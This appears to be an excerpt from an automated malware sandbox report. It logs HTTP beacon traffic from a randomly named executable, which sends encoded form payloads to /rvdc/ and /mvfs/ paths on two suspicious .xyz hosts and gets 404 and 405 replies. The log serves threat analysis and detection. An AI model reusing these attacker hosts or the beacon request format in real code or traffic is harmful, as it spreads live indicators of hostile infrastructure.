                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Origin: http://www.infiniteve.xyz
                                                                        Referer: http://www.infiniteve.xyz/rvdc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 31 51 36 59 37 70 69 47 6e 42 6c 69 4f 39 41 66 65 79 59 49 42 57 41 74 55 4a 34 61 46 4e 4f 5a 77 79 36 55 50 71 49 61 5a 4c 47 72 2b 65 31 37 2f 69 46 6d 6e 74 6f 72 39 57 57 55 65 73 37 43 64 66 4d 58 54 50 37 69 73 31 68 36 48 6f 6e 78 66 6c 48 75 50 34 30 64 4a 2f 2f 4f 41 4b 57 41 67 6f 4e 54 48 39 77 71 6c 44 62 76 2f 4b 76 41 4e 4f 43 6d 71 37 6f 57 52 6c 75 68 31 36 62 68 58 30 79 46 71 31 51 43 51 52 77 47 6a 47 54 53 49 30 39 5a 74 68 79 54 6a 4c 42 50 4b 53 7a 52 6b 6c 30 32 68 5a 34 62 35 71 71 4d 6a 34 43 48 6b 53 72 46 4a 74 47 6a 59 4f 2b 49 5a 68 31 50 4c 67 3d 3d
                                                                        Data Ascii: JZfd=1Q6Y7piGnBliO9AfeyYIBWAtUJ4aFNOZwy6UPqIaZLGr+e17/iFmntor9WWUes7CdfMXTP7is1h6HonxflHuP40dJ//OAKWAgoNTH9wqlDbv/KvANOCmq7oWRluh16bhX0yFq1QCQRwGjGTSI09ZthyTjLBPKSzRkl02hZ4b5qqMj4CHkSrFJtGjYO+IZh1PLg==
                                                                        Feb 18, 2025 08:15:50.452797890 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:50 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.452657162.0.231.203802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:52.394565105 CET854OUTPOST /rvdc/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Origin: http://www.infiniteve.xyz
                                                                        Referer: http://www.infiniteve.xyz/rvdc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 31 51 36 59 37 70 69 47 6e 42 6c 69 4e 64 51 66 62 56 30 49 56 47 41 75 62 70 34 61 50 74 50 65 77 79 6d 55 50 72 4d 73 65 35 53 72 35 2b 6c 37 6c 6e 70 6d 33 39 6f 72 6c 6d 57 72 61 73 37 64 64 66 49 78 54 4c 37 69 73 31 46 36 48 70 58 78 63 57 76 76 4e 6f 30 62 50 2f 2f 32 45 4b 57 41 67 6f 4e 54 48 39 6b 45 6c 44 7a 76 2f 36 2f 41 43 50 43 6c 30 4c 6f 58 53 6c 75 68 6a 4b 62 6c 58 30 79 37 71 78 52 58 51 55 30 47 6a 48 6a 53 49 46 39 61 6e 68 79 76 6e 4c 41 72 61 67 57 66 71 6b 52 47 6f 4a 77 33 2f 37 58 74 76 65 50 64 31 6a 4b 53 62 74 69 51 46 4a 33 38 55 69 49 47 51 73 4d 4d 48 58 2f 63 47 63 45 65 58 52 38 39 53 35 51 67 32 77 6b 3d
                                                                        Data Ascii: JZfd=1Q6Y7piGnBliNdQfbV0IVGAubp4aPtPewymUPrMse5Sr5+l7lnpm39orlmWras7ddfIxTL7is1F6HpXxcWvvNo0bP//2EKWAgoNTH9kElDzv/6/ACPCl0LoXSluhjKblX0y7qxRXQU0GjHjSIF9anhyvnLAragWfqkRGoJw3/7XtvePd1jKSbtiQFJ38UiIGQsMMHX/cGcEeXR89S5Qg2wk=
                                                                        Feb 18, 2025 08:15:52.974826097 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:52 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.452658162.0.231.20380
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:54.941356897 CET10936OUTPOST /rvdc/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Origin: http://www.infiniteve.xyz
                                                                        Referer: http://www.infiniteve.xyz/rvdc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 31 51 36 59 37 70 69 47 6e 42 6c 69 4e 64 51 66 62 56 30 49 56 47 41 75 62 70 34 61 50 74 50 65 77 79 6d 55 50 72 4d 73 65 35 4b 72 2b 4e 64 37 6d 45 52 6d 30 39 6f 72 6f 47 57 75 61 73 36 48 64 66 77 31 54 4c 33 59 73 33 74 36 47 4c 66 78 5a 6a 62 76 48 6f 30 62 4e 2f 2f 4e 41 4b 57 56 67 70 68 58 48 39 30 45 6c 44 7a 76 2f 2f 7a 41 4c 2b 43 6c 32 4c 6f 57 52 6c 75 74 31 36 62 64 58 30 4b 30 71 78 63 73 51 6e 38 47 6a 6e 7a 53 54 58 56 61 72 68 79 74 67 4c 41 7a 61 67 71 55 71 6b 4d 2f 6f 49 30 5a 2f 37 7a 74 6c 61 79 41 76 51 2b 4b 4d 72 4f 44 52 62 58 6e 56 77 4d 6d 59 4e 51 73 4c 56 54 7a 53 2b 46 39 4e 52 5a 4b 58 37 6b 45 74 32 68 46 56 62 4b 6f 33 6c 5a 62 38 45 59 4c 62 31 67 31 2f 6a 70 55 56 2f 37 4d 45 65 79 78 58 53 39 76 38 4a 56 69 79 74 73 44 68 7a 2f 55 72 66 65 6b 57 4f 34 4e 62 30 4d 6c 34 35 49 4f 4a 74 51 51 43 5a 6c 74 6b 74 55 41 68 68 62 65 59 31 76 6a 63 41 51 33 6c 70 68 32 5a 53 63 61 75 7a 48 62 58 35 55 43 4d 79 62 6d 6b 4d 31 56 76 53 67 49 37 65 31 73 77 [TRUNCATED]
                                                                        Data Ascii: JZfd=1Q6Y7piGnBliNdQfbV0IVGAubp4aPtPewymUPrMse5Kr+Nd7mERm09oroGWuas6Hdfw1TL3Ys3t6GLfxZjbvHo0bN//NAKWVgphXH90ElDzv//zAL+Cl2LoWRlut16bdX0K0qxcsQn8GjnzSTXVarhytgLAzagqUqkM/oI0Z/7ztlayAvQ+KMrODRbXnVwMmYNQsLVTzS+F9NRZKX7kEt2hFVbKo3lZb8EYLb1g1/jpUV/7MEeyxXS9v8JViytsDhz/UrfekWO4Nb0Ml45IOJtQQCZltktUAhhbeY1vjcAQ3lph2ZScauzHbX5UCMybmkM1VvSgI7e1sw5XQveACsXWqaDs3iclrE5b75mVlnF2CG0+m20u78WC/kzdbeEd9icmwWLfVD7qZYcdK9Zar+n7BmTDesV0D/evc247pyt26OGyVBvUNMxAUI7EcuSx31IjLXRS95j+ITwua0tsk6ai781/FC7yiGRLHxpfCwFE/0DhqueAagbk7zK7D8AtdNER902uBHenwR2VSwX2cOpys8Ecpjb7zuZXXKPGwwsOcwJf0s8KElTKOpQjiAgvZ/SL4Uj+hakOTpcnJFVJxRgbQD2WWD8KQ2hlkGR0HfQkjdwCp9WkbXDtV1L6M835S4p3B/RSqWMENheWFu6ecEreM+0X7gLvKDZ0yNHStpKHMwr+KS9r3wO09m4kxEHV1xY0zMQYNpjduT+NYvzUr3Gq+HY/JTDfz6I8NN2N/kQBOPJO6yU8s7Tmm7FBue+0RZ2KMdLDaNX4+NhqEuZF2bIaxwam49UjR4cC0f1moGtqQDxVzzRapfGtsbxi2v9II0tWZXRwbE3/R3e4poLJ2sNmG4SHjJOQe9hBC9U0jtoQYwvHK7I3g8shTftW+XfOLapD3haf4t+j1o9T6D3jiA5TM1F/z8X/Zs203UK8QSe29AANtv/Yuk1ZQ5XuD/1L0RdDLXUkwm/eNfLv6Qk6csDb7NdCJnPMHSj5rRr5ycKd5GsI [TRUNCATED]
                                                                        Feb 18, 2025 08:15:55.550357103 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:55 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.452659162.0.231.203802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:57.481786966 CET569OUTGET /rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:58.060925961 CET548INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:57 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.45266013.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:03.216617107 CET840OUTPOST /mvfs/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Origin: http://www.weilaishijie.xyz
                                                                        Referer: http://www.weilaishijie.xyz/mvfs/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 44 56 57 33 46 77 31 74 4c 68 71 79 75 54 79 2b 68 58 6b 4a 5a 51 47 5a 79 42 4f 4c 6e 78 4e 66 7a 2b 77 45 30 62 69 44 32 4c 35 69 4a 49 70 77 46 62 77 38 64 67 56 57 61 43 70 74 71 76 76 61 69 41 67 38 64 47 6f 6c 43 62 63 36 36 61 76 43 59 6d 71 44 65 65 70 65 66 75 63 39 59 30 53 63 4b 6c 37 64 33 68 79 57 41 55 33 31 42 66 4d 32 51 4a 49 46 65 2b 39 61 6f 52 6f 38 68 36 32 6d 4d 44 79 30 63 71 61 66 4d 6c 37 6f 35 64 6a 6e 51 51 69 2f 68 6c 4c 49 51 65 74 69 76 41 46 2b 72 43 79 34 4b 31 6f 66 65 65 45 78 42 78 6d 76 79 58 38 42 77 6c 35 66 4d 34 6f 64 76 43 6a 56 64 67 3d 3d
                                                                        Data Ascii: JZfd=DVW3Fw1tLhqyuTy+hXkJZQGZyBOLnxNfz+wE0biD2L5iJIpwFbw8dgVWaCptqvvaiAg8dGolCbc66avCYmqDeepefuc9Y0ScKl7d3hyWAU31BfM2QJIFe+9aoRo8h62mMDy0cqafMl7o5djnQQi/hlLIQetivAF+rCy4K1ofeeExBxmvyX8Bwl5fM4odvCjVdg==
                                                                        Feb 18, 2025 08:16:03.676928043 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.45266113.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:05.771408081 CET860OUTPOST /mvfs/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Origin: http://www.weilaishijie.xyz
                                                                        Referer: http://www.weilaishijie.xyz/mvfs/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 44 56 57 33 46 77 31 74 4c 68 71 79 76 77 36 2b 6a 30 4d 4a 65 77 47 61 32 78 4f 4c 74 52 4e 62 7a 2b 38 45 30 66 36 54 32 39 42 69 49 70 5a 77 47 5a 49 38 55 77 56 57 53 69 6f 6c 79 50 76 54 69 41 73 30 64 48 45 6c 43 62 49 36 36 62 66 43 5a 56 79 4d 66 4f 70 59 53 4f 63 2f 47 45 53 63 4b 6c 37 64 33 68 33 4c 41 55 66 31 47 73 55 32 52 6f 49 43 64 2b 39 46 2f 68 6f 38 6c 36 33 74 4d 44 79 43 63 72 47 78 4d 6e 44 6f 35 64 54 6e 52 42 69 77 6f 6c 4c 30 65 2b 73 68 68 67 67 76 75 43 53 35 56 57 59 4b 42 63 31 58 4a 58 72 31 6a 6d 64 57 69 6c 64 73 52 2f 68 70 69 42 65 63 47 6d 61 51 2f 41 69 37 6b 76 50 39 5a 49 4e 76 57 65 71 7a 64 78 4d 3d
                                                                        Data Ascii: JZfd=DVW3Fw1tLhqyvw6+j0MJewGa2xOLtRNbz+8E0f6T29BiIpZwGZI8UwVWSiolyPvTiAs0dHElCbI66bfCZVyMfOpYSOc/GEScKl7d3h3LAUf1GsU2RoICd+9F/ho8l63tMDyCcrGxMnDo5dTnRBiwolL0e+shhggvuCS5VWYKBc1XJXr1jmdWildsR/hpiBecGmaQ/Ai7kvP9ZINvWeqzdxM=
                                                                        Feb 18, 2025 08:16:06.212783098 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.45266213.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:16:08.324414968 CET10942OUTPOST /mvfs/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Origin: http://www.weilaishijie.xyz
                                                                        Referer: http://www.weilaishijie.xyz/mvfs/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 44 56 57 33 46 77 31 74 4c 68 71 79 76 77 36 2b 6a 30 4d 4a 65 77 47 61 32 78 4f 4c 74 52 4e 62 7a 2b 38 45 30 66 36 54 32 39 4a 69 4a 62 42 77 46 2b 6b 38 4f 77 56 57 52 69 6f 6b 79 50 75 52 69 41 30 4b 64 48 5a 53 43 65 4d 36 37 39 72 43 65 67 47 4d 56 4f 70 59 4f 2b 63 79 59 30 54 45 4b 6c 72 5a 33 68 48 4c 41 55 66 31 47 72 73 32 57 35 49 43 62 2b 39 61 6f 52 6f 4b 68 36 33 46 4d 48 57 53 63 72 43 50 4e 55 4c 6f 34 35 33 6e 53 7a 4b 77 6e 6c 4c 32 64 2b 73 44 68 67 64 33 75 42 33 41 56 57 63 67 42 66 70 58 4d 79 47 4f 2f 45 4e 43 39 56 55 2b 43 49 5a 6f 6e 54 2b 5a 49 48 6e 76 37 54 6d 36 32 64 66 64 62 59 30 42 50 4d 4c 77 63 31 4d 43 33 6e 30 47 42 45 2b 46 59 7a 66 38 34 5a 56 2b 76 55 50 76 32 45 59 55 44 2f 4b 68 4e 77 6d 43 42 73 65 6c 53 31 45 7a 32 64 41 42 70 69 45 67 37 34 75 68 72 32 78 63 54 78 55 7a 32 48 6c 42 45 2b 79 43 32 36 53 34 54 4a 6c 2f 36 74 4f 4f 6b 51 70 59 6a 37 4d 4b 72 58 54 46 67 36 6b 33 44 66 4c 72 56 4d 6b 58 53 66 68 61 31 59 34 6e 79 65 64 64 76 [TRUNCATED]
                                                                        Data Ascii: JZfd=DVW3Fw1tLhqyvw6+j0MJewGa2xOLtRNbz+8E0f6T29JiJbBwF+k8OwVWRiokyPuRiA0KdHZSCeM679rCegGMVOpYO+cyY0TEKlrZ3hHLAUf1Grs2W5ICb+9aoRoKh63FMHWScrCPNULo453nSzKwnlL2d+sDhgd3uB3AVWcgBfpXMyGO/ENC9VU+CIZonT+ZIHnv7Tm62dfdbY0BPMLwc1MC3n0GBE+FYzf84ZV+vUPv2EYUD/KhNwmCBselS1Ez2dABpiEg74uhr2xcTxUz2HlBE+yC26S4TJl/6tOOkQpYj7MKrXTFg6k3DfLrVMkXSfha1Y4nyeddvt0j1FHvExiN0GdNFPzEFxatJaXw1AO7akWpTiCPgJROALZvtsWNMofh235arjIJVW0Q83ZcJth9xpe1s5bJ7FkXarXUKA6foxFrfcJVotC4See4HevjdDHuA0vWU+rUWoOypMg3upTXvik4GDF6tXvtirJh7G/Of6uc3MR92e7FeZDxdTvLP1pkmCnldW8eG1nWWbvFwAaG+rhQwgrznmttlt8uuk9mh6SffeIBhIC9SImMyGgKgZqOPRjEgMnMlQbLhRTiW8h50d0YYBI45ddFJvQAIpF0+/me/adQMiNLIC7KyKOhm3ucBpEDWR+/NneTThKHbUvMB2MUiNEJy92eL+6Hd/5fHVK8uURRukWJUCyBZYMNjlLCmUQdr/lVSMsDOpl6fR4vkQ954qBQ5gqRmxZ0ZQMErjA4Qe1he2nkOQOGLKapvlVXjuAUy1H6/NA1Cm49FtNxFJyRiSYK55WJ3lHjLwGl+AZQL4E6ytRijL1brkPzN6jKvIiMT3mf/7K2Rat+aJrv2xhehBakRdc6xcWjzCfVl7X6ehzven6Z+SmbLpiiy/1e3erApEsbpH6CJLDmzNv/Ta53Rt20VXAz+UiEH1aKzvK748CTkbIawXR5pAs5+T+i87oyA0PYkk/4fsyfroB6CyXPKpUndS1ZrPnTK2ozMsR [TRUNCATED]
                                                                        Feb 18, 2025 08:16:08.769023895 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
